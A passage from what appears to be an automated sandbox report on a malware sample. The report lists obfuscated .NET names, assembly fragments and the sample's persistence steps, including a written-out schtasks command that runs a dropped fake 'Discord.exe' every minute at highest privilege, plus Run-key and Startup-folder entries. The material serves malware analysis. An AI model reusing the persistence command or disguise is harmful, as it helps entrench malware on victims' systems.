Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 7_2_00007FFD9B6BD2A5 pushad ; iretd 7_2_00007FFD9B6BD2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 7_2_00007FFD9B7DBAE8 push E85A82D7h; ret 7_2_00007FFD9B7DBAF9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 7_2_00007FFD9B7DACFA push E95978A2h; ret 7_2_00007FFD9B7DAE29
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 7_2_00007FFD9B7D00AD pushad ; iretd 7_2_00007FFD9B7D00C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 7_2_00007FFD9B8A2316 push 8B485F94h; iretd 7_2_00007FFD9B8A231B
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 11_2_00007FFD9B6CD2A5 pushad ; iretd 11_2_00007FFD9B6CD2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 11_2_00007FFD9B7E00AD pushad ; iretd 11_2_00007FFD9B7E00C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 11_2_00007FFD9B8B2316 push 8B485F93h; iretd 11_2_00007FFD9B8B231B
Source: C:\Users\user\AppData\Roaming\Discord.exe Code function: 15_2_00007FFD9B7D00AD pushad ; iretd 15_2_00007FFD9B7D00C1
Source: C:\Users\user\AppData\Roaming\Discord.exe Code function: 16_2_00007FFD9B7C00AD pushad ; iretd 16_2_00007FFD9B7C00C1
Source: C:\Users\user\AppData\Roaming\Discord.exe Code function: 17_2_00007FFD9B8000AD pushad ; iretd 17_2_00007FFD9B8000C1
Source: C:\Users\user\AppData\Roaming\Discord.exe Code function: 18_2_00007FFD9B7D00AD pushad ; iretd 18_2_00007FFD9B7D00C1
Source: C:\Users\user\AppData\Roaming\Discord.exe Code function: 20_2_00007FFD9B7E00AD pushad ; iretd 20_2_00007FFD9B7E00C1
Source: s3OBQLA3xR.exe, CZoQY5TPrA.cs High entropy of concatenated method names: '_9N48TDzPlp', 'sy68DDUpDh', '_9o87DLQc1n', 'cyDl7x4rnou9y4jNmiVSwBQWGahG', 'ac1VmwfQeZ5rtk0vNqL35KqxW6az', 'rSmDeTUawE7wPP7807wow4Ki45Iq', 'EEE1qt68Ifr4pCwbu32jKghGO3om', 'Zssh28rP4muRkGPC4LeVvpZahTvj', 'x3nVq4KS65LPH72Oi6Bi3vGETwua', 'IGVftO82XPk1jRUnUaOJ5vkRfaxc'
Source: s3OBQLA3xR.exe, jZqCUwrJdKr0z9RYd14cbRFGh4hvyqVQ29P148v6qUG9lxXZEbSwb5XHnXh1nYUDDR1h.cs High entropy of concatenated method names: 'ohXYP8Uko9U95pjMwnQbLzUFEPdDh1gxY3Lxatao6nOlZFPCfrgY1HTpBlJlmHIGYMzb', 'PWxz7Gney6usw9eueX4CD2LGxqA1z1lnL73Ho9T7auA5xJSyHcdId84TwlZIk5OuWcRB', 'OJKhW1EvmFx7pk4vxpDjrRJvYJ9far7zYuFX4JEepPT1JmfE0O25zdDlGo86EUCxEiwv', 'o6lCx7lhJJ2LMtvK051igoGlPxHUaNrXIZwdZKbdTFp7TTyZV1fYgL8wleOAC4MV5hsr', 'EB0AUSwEn2ZUVM4yxNUc3dtLqy5lqtQiNii6diQvh1jZTJMU9OG90kddybdJ8Q2gPj2g', '_1hHnFcRcTVwKMoVDsztG3aJYzKkVxA3V27zB5I9Efq0R5F7hUoj5J9q2PndboJsZFQbF', 'jTUbfAvi5yCDAYlzI7OvS9HnpoRD6T3mM4ZaJDIN4KmYgmmPFnfn3CkU1On5fFAhtIAL', 'PNZmqOCVf9WZber8xvC3lwmCoSwJzfknoDxAvp8kDmDyBZUOqcXjF5Ss3Dg5CuODA7ut', 'jEtJk6YmDSKTdcK65x6qMNo8jnLwkkJLMC7jrYkbB2ohCx6JPjZgsX04msoW9YkEyY3T', 'iEgdlhIqZOTUNE6aLhSFH5zABLx4EXZmv6nPBdXaYgRwBNBcoQxySObpw5BLb93TsNP5'
Source: s3OBQLA3xR.exe, sobWCqEaS5.cs High entropy of concatenated method names: 'h1gE9kffIY', 'n2rjTga0nCPTeZiYYZTgtFWpi4jW', '_9KzP4xoYMJSNc9E23pv58qTmrxcV', 'lLlNzB2h8MKY7t1gX6zkhsmjs6Xp', 'FZX4QAuopMG0e4YxMVGoirF7dIs8'
Source: s3OBQLA3xR.exe, 6mxeqGA8sGKwxoWnPU3gFq7MAvGAa88aOk2fUQoaodsFPsM7YR1gydyk9eQg2nc9Um4G.cs High entropy of concatenated method names: 'K6yUrNFATVoGVqtQ2J7fmVMdUwHyLi29ZHSRSW1wVOLlHyqBumYz1Xf99CfoB4EboXnl', '_0BQ3F0Ehl9xngE4QA0amkyOgawIz7J6HbPSnpgvWVuH', 'YYgUewv3k3mbgAPGphUDp5EOF1tyv3JNnnFvArMiQ0T', 'hcDYmIIenLtT2fh8CVzT1iDyzuaw57N1bFFxvM94x8n', 'yeDmKkRW2lnI4uOuPBBx3bPpflrrf0ROrflKCQbA27d'
Source: s3OBQLA3xR.exe, xvglY57lNk9vQYqTfbKTBIlchHJYPPgp5YJaV63YWyHSbagxNbKBjxAD4KeBAH1BOeu7.cs High entropy of concatenated method names: 'FRD8GC4inkaTauOGW0yWfUW6CC1TEVmBiP7NEZnYikjgTQ942rLCTBZZd9NdJaA8tz7X', 'bHnkGDpXqFzt70MnWagzYN5yX1smqNOidboKqkKI2eaCWKJXeswzVych0Wp1PIDBTUHu', '_0tGYNqW6Tm3FUaxV9VzNKUey26iSUAImqOuJqHbztjriPY8GRzCh7zALlD1ivxzivv6T', '_8ieB9V4HS3NhLDTdSVkvPiZczbAYydc3mjDJxqiVefVT1IKCPzFkiBsuAJOWP9GZwXkO', 'rH289oWq0fSMYtvt05itzsuNqdayt3CElayt86GY8QGIQJB70HOBi1oeZdIudiSQRP3q', 'kAZ22kEE53ZFygpt8mtUfVWCKUBf1Q2ICnWbzHJkfYuJqlJ2w2iWqKKKowerYv5Xrf2f', 'mELwor4E4WN8BzyKIfwKcue9PQCYI583ocJRxA9z4QyD47PoX7Ss16YnuRPPAn9SIu9y', 'HkS6hhdvSpSdlXnyQBIAVdzj9JBCvvM362mzto0U4gdSak4keKrwEnQ8vODFuEayu2KF', 'ofsUYbfRDOdoLbO9DS5zyu98s4ji1N2dD4vnoc6ROpzjE1QAu303DdlXhrwvcyDKynfw', 'ax1uNjsuN7DgGS4s7RN2NLp29tKDKu6WUCatpY7f9BpiEY09lssUNujchmF17RGoBpwn'
Source: s3OBQLA3xR.exe, U9pHMOisPp.cs High entropy of concatenated method names: 'V1ebUJOBAV', 'N8Mno0anep', 'El3GnIDnLf', 'ANiwQr3ERh', '_8eC744DY2y', 'MdY7Ll7gYs', 'bzN1Mlomzo', 'VMlY5YX2QA', '_48i9XQq3nG', 'YJaeefkY2s'
Source: s3OBQLA3xR.exe, NRAeYCnbqOCZiFjqnN8SJKmkAMWNrpsv6Rb1U06ICthKqLloDf62JFflqZ6EQmsdumIbzy5s19huEwlg5zQ.cs High entropy of concatenated method names: 'ligJKKSF1n1mRZKcvTI6chF8QRc8p8mbtBsKgjwJpp50rEb2Ju3RtUXUgwIxEsZD1OvJXNcUPCv8OTygEQi', 'f5uV8pn7lmcIDAa6g8Pl7c7mfzdr9pCz38BqZfC9XiLvFuBcX7IH7pCR4bWsHJMoALRqSuMQlhEO1owX2va', 'rkUPK0TMy82PJ44L80TKiSoKnaTy6dJFUjgYUx8bOsCeB4L1g2Awb3ohBs4xIIYRCkUbomhGu49a1ZGIWFx', 'jMWrGzt4HSckisu6h2mXyDfr6fdcMSau4sajG4ggcL2WoXTiAhumPh6ceCgyC0y5N9IUND4e0lobEBxwnLb', 'fP2RtqhTTC1UT5NKYEGbkkDOcZgbFyyqYgqANKnUFwjXXr1cGz8gDKiRtfQRGYqNRWMqblkTk89Syl4zC8L', 'avkaseHzf1TOnKieFjC2zxWwRkzGPQlPNudU53CY3xyE5hZnBKQt2cOmMmabWZuaRZuf5AYsVpSEKjEKTaY', 'cjPjGgi53fkGbOSu54282n9YtKV9d8U84FmH39z0V4A1tBWTEhpoEYYb42U8C35bX1esYPhj1kctH983EG3', 'Y8u9hBZuHt4IbFMcCnKF6XmwGEKiliKQslqvX1ypJ5jDcMXtlP2QATtLNfDwK0EUinfWLOyBr6nMcl2oL82', 'aZLnZuxmvgWCGnycKXQlANyGMtdkwFQsCxuuvfAyafUPUlGQZabmbcyCCNdVlV3yz29B99FjrbkGt9NlTwi', 'Ps3umLucOhLRAfDMi4gDHYqZNHcMenflp7TaKZ2WUsVPygXehATuqxabxw0236utz4v4k9xhL6CQMDWuM69'
Source: s3OBQLA3xR.exe, EthTUQiaut.cs High entropy of concatenated method names: 'gR5ZScRWGE', 'P8Ck7Bercp', '_55RmmAyJ2t', 'zQaaSdJChj', 'oXvpgODT5AQv0KmDPT0SkmsFOncu', '_5w2F92eBYJADRO6xZdtmrW5EAswL', 'RotvUybCrXuKg3iUA6atrkMigMK4', 'gQi6PFKRJsw6IKxzuELSlU9Gs6zv', 'lQ90nuKnXhRmKkfrgSVRsqJHIWYA', 'RbykDHqQWXTLJznyEEt3nvH85xCP'
Source: s3OBQLA3xR.exe, GaULpswXIufzTGkabH57dWAWZLAY2FIFLB2IiUzoLOWVlY0Ba2R9rd92KzjGYDa6qNvw9fm4P8nngRNQQ9G.cs High entropy of concatenated method names: 'fCXp6gdRaP1Ga0BC6yMxRXNP01BSH1K2FLSf00udV2wsPcIZkOGXuoBEtaSpioLacknDjaKmexsXfYZIXPk', 'xVOg5GQNIMvgdG2GcHSwPK6cFDZX8uxSvsscCNbhuKB9TfjfpIyCxl8L7U8lo6LYTJwnXdq16gU4fZ1QqMA', 'vImOKhBDwa5N5bJnMXkUfNua8fGenB5BcZp7PcvVjt83QAqOPseV6QAPhSQCXtbdlcD4B28zsV0mACprxkZ', 'i2nqIY4Th7dW1pwhIXK8CPqAR5icyNuolOvNdSabDwiOPPnUuvib3UZOZAL2tYqRjzRREYUCVMzTycUBy6H', 'wKyzeyqDVhzzUhThgNSx5mBbOTAWAuPO6xzZratl0t6C1Ct9gKMyGFXYAEXuTaR2uGEH9ClO09c1oKCBqz9', 'Dk6fIypn5gh1WOGYgtFzKklTn0WKfqRrXo4KRQJeoCk6FrgHViopsRptlcszMpEPbmw6rBsDVVzgbk3SAk7', 'QRoRxOgEGa1ZQCbaWKD4iDXVlnp9G7xRSxrXxkXfyRHH8BarawMoWU4f7vHUVPCfnvbAuCwkL4eHSFbjccf', 'suzMtiR1YfuSljVWnLq9FyoK7ysScmVdYBYFekilX2qTWARdHnSKTfZj2QsjLDBBLGUlmzzTDRBTXvnxelE', 'EzDSI6NqXosMtNhIdsVBJIMmOaD3oVxWGBd1WidW19loZ4vqAayTevSsEtZDzmE9PDouY98jaLLG8ej5cwo', 'lFENce2C326C8WrMM0xMnFwqA7q9v3cXjEDy3KJ7Gmt9KadoBYIP0UDakw7zHHMRaVlx'
Source: Discord.exe.0.dr, CZoQY5TPrA.cs High entropy of concatenated method names: '_9N48TDzPlp', 'sy68DDUpDh', '_9o87DLQc1n', 'cyDl7x4rnou9y4jNmiVSwBQWGahG', 'ac1VmwfQeZ5rtk0vNqL35KqxW6az', 'rSmDeTUawE7wPP7807wow4Ki45Iq', 'EEE1qt68Ifr4pCwbu32jKghGO3om', 'Zssh28rP4muRkGPC4LeVvpZahTvj', 'x3nVq4KS65LPH72Oi6Bi3vGETwua', 'IGVftO82XPk1jRUnUaOJ5vkRfaxc'
Source: Discord.exe.0.dr, jZqCUwrJdKr0z9RYd14cbRFGh4hvyqVQ29P148v6qUG9lxXZEbSwb5XHnXh1nYUDDR1h.cs High entropy of concatenated method names: 'ohXYP8Uko9U95pjMwnQbLzUFEPdDh1gxY3Lxatao6nOlZFPCfrgY1HTpBlJlmHIGYMzb', 'PWxz7Gney6usw9eueX4CD2LGxqA1z1lnL73Ho9T7auA5xJSyHcdId84TwlZIk5OuWcRB', 'OJKhW1EvmFx7pk4vxpDjrRJvYJ9far7zYuFX4JEepPT1JmfE0O25zdDlGo86EUCxEiwv', 'o6lCx7lhJJ2LMtvK051igoGlPxHUaNrXIZwdZKbdTFp7TTyZV1fYgL8wleOAC4MV5hsr', 'EB0AUSwEn2ZUVM4yxNUc3dtLqy5lqtQiNii6diQvh1jZTJMU9OG90kddybdJ8Q2gPj2g', '_1hHnFcRcTVwKMoVDsztG3aJYzKkVxA3V27zB5I9Efq0R5F7hUoj5J9q2PndboJsZFQbF', 'jTUbfAvi5yCDAYlzI7OvS9HnpoRD6T3mM4ZaJDIN4KmYgmmPFnfn3CkU1On5fFAhtIAL', 'PNZmqOCVf9WZber8xvC3lwmCoSwJzfknoDxAvp8kDmDyBZUOqcXjF5Ss3Dg5CuODA7ut', 'jEtJk6YmDSKTdcK65x6qMNo8jnLwkkJLMC7jrYkbB2ohCx6JPjZgsX04msoW9YkEyY3T', 'iEgdlhIqZOTUNE6aLhSFH5zABLx4EXZmv6nPBdXaYgRwBNBcoQxySObpw5BLb93TsNP5'
Source: Discord.exe.0.dr, sobWCqEaS5.cs High entropy of concatenated method names: 'h1gE9kffIY', 'n2rjTga0nCPTeZiYYZTgtFWpi4jW', '_9KzP4xoYMJSNc9E23pv58qTmrxcV', 'lLlNzB2h8MKY7t1gX6zkhsmjs6Xp', 'FZX4QAuopMG0e4YxMVGoirF7dIs8'
Source: Discord.exe.0.dr, 6mxeqGA8sGKwxoWnPU3gFq7MAvGAa88aOk2fUQoaodsFPsM7YR1gydyk9eQg2nc9Um4G.cs High entropy of concatenated method names: 'K6yUrNFATVoGVqtQ2J7fmVMdUwHyLi29ZHSRSW1wVOLlHyqBumYz1Xf99CfoB4EboXnl', '_0BQ3F0Ehl9xngE4QA0amkyOgawIz7J6HbPSnpgvWVuH', 'YYgUewv3k3mbgAPGphUDp5EOF1tyv3JNnnFvArMiQ0T', 'hcDYmIIenLtT2fh8CVzT1iDyzuaw57N1bFFxvM94x8n', 'yeDmKkRW2lnI4uOuPBBx3bPpflrrf0ROrflKCQbA27d'
Source: Discord.exe.0.dr, xvglY57lNk9vQYqTfbKTBIlchHJYPPgp5YJaV63YWyHSbagxNbKBjxAD4KeBAH1BOeu7.cs High entropy of concatenated method names: 'FRD8GC4inkaTauOGW0yWfUW6CC1TEVmBiP7NEZnYikjgTQ942rLCTBZZd9NdJaA8tz7X', 'bHnkGDpXqFzt70MnWagzYN5yX1smqNOidboKqkKI2eaCWKJXeswzVych0Wp1PIDBTUHu', '_0tGYNqW6Tm3FUaxV9VzNKUey26iSUAImqOuJqHbztjriPY8GRzCh7zALlD1ivxzivv6T', '_8ieB9V4HS3NhLDTdSVkvPiZczbAYydc3mjDJxqiVefVT1IKCPzFkiBsuAJOWP9GZwXkO', 'rH289oWq0fSMYtvt05itzsuNqdayt3CElayt86GY8QGIQJB70HOBi1oeZdIudiSQRP3q', 'kAZ22kEE53ZFygpt8mtUfVWCKUBf1Q2ICnWbzHJkfYuJqlJ2w2iWqKKKowerYv5Xrf2f', 'mELwor4E4WN8BzyKIfwKcue9PQCYI583ocJRxA9z4QyD47PoX7Ss16YnuRPPAn9SIu9y', 'HkS6hhdvSpSdlXnyQBIAVdzj9JBCvvM362mzto0U4gdSak4keKrwEnQ8vODFuEayu2KF', 'ofsUYbfRDOdoLbO9DS5zyu98s4ji1N2dD4vnoc6ROpzjE1QAu303DdlXhrwvcyDKynfw', 'ax1uNjsuN7DgGS4s7RN2NLp29tKDKu6WUCatpY7f9BpiEY09lssUNujchmF17RGoBpwn'
Source: Discord.exe.0.dr, U9pHMOisPp.cs High entropy of concatenated method names: 'V1ebUJOBAV', 'N8Mno0anep', 'El3GnIDnLf', 'ANiwQr3ERh', '_8eC744DY2y', 'MdY7Ll7gYs', 'bzN1Mlomzo', 'VMlY5YX2QA', '_48i9XQq3nG', 'YJaeefkY2s'
Source: Discord.exe.0.dr, NRAeYCnbqOCZiFjqnN8SJKmkAMWNrpsv6Rb1U06ICthKqLloDf62JFflqZ6EQmsdumIbzy5s19huEwlg5zQ.cs High entropy of concatenated method names: 'ligJKKSF1n1mRZKcvTI6chF8QRc8p8mbtBsKgjwJpp50rEb2Ju3RtUXUgwIxEsZD1OvJXNcUPCv8OTygEQi', 'f5uV8pn7lmcIDAa6g8Pl7c7mfzdr9pCz38BqZfC9XiLvFuBcX7IH7pCR4bWsHJMoALRqSuMQlhEO1owX2va', 'rkUPK0TMy82PJ44L80TKiSoKnaTy6dJFUjgYUx8bOsCeB4L1g2Awb3ohBs4xIIYRCkUbomhGu49a1ZGIWFx', 'jMWrGzt4HSckisu6h2mXyDfr6fdcMSau4sajG4ggcL2WoXTiAhumPh6ceCgyC0y5N9IUND4e0lobEBxwnLb', 'fP2RtqhTTC1UT5NKYEGbkkDOcZgbFyyqYgqANKnUFwjXXr1cGz8gDKiRtfQRGYqNRWMqblkTk89Syl4zC8L', 'avkaseHzf1TOnKieFjC2zxWwRkzGPQlPNudU53CY3xyE5hZnBKQt2cOmMmabWZuaRZuf5AYsVpSEKjEKTaY', 'cjPjGgi53fkGbOSu54282n9YtKV9d8U84FmH39z0V4A1tBWTEhpoEYYb42U8C35bX1esYPhj1kctH983EG3', 'Y8u9hBZuHt4IbFMcCnKF6XmwGEKiliKQslqvX1ypJ5jDcMXtlP2QATtLNfDwK0EUinfWLOyBr6nMcl2oL82', 'aZLnZuxmvgWCGnycKXQlANyGMtdkwFQsCxuuvfAyafUPUlGQZabmbcyCCNdVlV3yz29B99FjrbkGt9NlTwi', 'Ps3umLucOhLRAfDMi4gDHYqZNHcMenflp7TaKZ2WUsVPygXehATuqxabxw0236utz4v4k9xhL6CQMDWuM69'
Source: Discord.exe.0.dr, EthTUQiaut.cs High entropy of concatenated method names: 'gR5ZScRWGE', 'P8Ck7Bercp', '_55RmmAyJ2t', 'zQaaSdJChj', 'oXvpgODT5AQv0KmDPT0SkmsFOncu', '_5w2F92eBYJADRO6xZdtmrW5EAswL', 'RotvUybCrXuKg3iUA6atrkMigMK4', 'gQi6PFKRJsw6IKxzuELSlU9Gs6zv', 'lQ90nuKnXhRmKkfrgSVRsqJHIWYA', 'RbykDHqQWXTLJznyEEt3nvH85xCP'
Source: Discord.exe.0.dr, GaULpswXIufzTGkabH57dWAWZLAY2FIFLB2IiUzoLOWVlY0Ba2R9rd92KzjGYDa6qNvw9fm4P8nngRNQQ9G.cs High entropy of concatenated method names: 'fCXp6gdRaP1Ga0BC6yMxRXNP01BSH1K2FLSf00udV2wsPcIZkOGXuoBEtaSpioLacknDjaKmexsXfYZIXPk', 'xVOg5GQNIMvgdG2GcHSwPK6cFDZX8uxSvsscCNbhuKB9TfjfpIyCxl8L7U8lo6LYTJwnXdq16gU4fZ1QqMA', 'vImOKhBDwa5N5bJnMXkUfNua8fGenB5BcZp7PcvVjt83QAqOPseV6QAPhSQCXtbdlcD4B28zsV0mACprxkZ', 'i2nqIY4Th7dW1pwhIXK8CPqAR5icyNuolOvNdSabDwiOPPnUuvib3UZOZAL2tYqRjzRREYUCVMzTycUBy6H', 'wKyzeyqDVhzzUhThgNSx5mBbOTAWAuPO6xzZratl0t6C1Ct9gKMyGFXYAEXuTaR2uGEH9ClO09c1oKCBqz9', 'Dk6fIypn5gh1WOGYgtFzKklTn0WKfqRrXo4KRQJeoCk6FrgHViopsRptlcszMpEPbmw6rBsDVVzgbk3SAk7', 'QRoRxOgEGa1ZQCbaWKD4iDXVlnp9G7xRSxrXxkXfyRHH8BarawMoWU4f7vHUVPCfnvbAuCwkL4eHSFbjccf', 'suzMtiR1YfuSljVWnLq9FyoK7ysScmVdYBYFekilX2qTWARdHnSKTfZj2QsjLDBBLGUlmzzTDRBTXvnxelE', 'EzDSI6NqXosMtNhIdsVBJIMmOaD3oVxWGBd1WidW19loZ4vqAayTevSsEtZDzmE9PDouY98jaLLG8ej5cwo', 'lFENce2C326C8WrMM0xMnFwqA7q9v3cXjEDy3KJ7Gmt9KadoBYIP0UDakw7zHHMRaVlx'
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe File created: C:\Users\user\AppData\Roaming\Discord.exe Jump to dropped file

Boot Survival

barindex
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Discord" /tr "C:\Users\user\AppData\Roaming\Discord.exe"
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Discord.lnk Jump to behavior
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Discord.lnk Jump to behavior
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Discord Jump to behavior
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Discord Jump to behavior

Hooking and other Techniques for Hiding and Protection

barindex
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\s3OBQLA3xR.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
